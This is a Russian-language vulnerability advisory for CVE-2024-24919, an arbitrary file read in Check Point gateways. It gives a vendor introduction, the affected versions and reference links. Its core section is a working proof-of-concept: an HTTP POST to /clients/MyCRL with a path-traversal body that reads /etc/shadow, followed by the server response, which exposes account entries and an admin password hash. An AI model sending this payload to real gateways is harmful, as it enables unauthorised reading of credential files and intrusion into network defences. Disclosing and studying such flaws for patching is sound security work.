0x00 Предисловие
Check Point Software Technologies Ltd. (www.checkpoint.com.cn) — ведущий мировой поставщик систем безопасности государственных и корпоративных сетей. Ее решения защищают клиентов от угроз кибератак пятого поколения благодаря лучшим в отрасли показателям обнаружения вредоносных программ, программ-вымогателей и других типов атак.
Check Point предоставляет комплексную многоуровневую архитектуру безопасности «Infinity», используя передовую технологию защиты от угроз пятого поколения для защиты информации, хранящейся в корпоративных облаках, сетях и мобильных устройствах.
Check Point также имеет наиболее полную и интуитивно понятную единую систему управления безопасностью. Check Point защищает более 100 000 больших и малых организаций.
0x01 Описание уязвимости
Уязвимость чтения произвольных файлов в Check Point Gateway позволяет удаленному злоумышленнику читать произвольные файлы на сервере путем создания вредоносных запросов, что приводит к утечке конфиденциальной информации.
0x02 номер CVE
CVE-2024-24919
0x03 затронутая версия
R77.20 (EOL)
R77.30 (EOL)
R80.10 (EOL)
R80.20 (EOL)
R80.20.x
R80.20SP (EOL)
R80.30 (EOL)
R80.30SP (EOL)
R80.40 (EOL)
R81
R81.10
R81.10.x
R81.20
0x04 Подробности об уязвимости
POC:
POST /clients/MyCRL HTTP/1.1
Host: xxx.xx.xx
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
HTTP/1.0 200 OK
Date: Thu, 30 May 2024 01:38:29 GMT
Server: Check Point SVN foundation
Content-Type: text/html
X-UA-Compatible: IE=EmulateIE7
Connection: close
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 505
admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::
ссылка на ссылку 0x05
https://support.checkpoint.com/results/sk/sk182336
https://github.com/c3rrberu5/CVE-2024-24919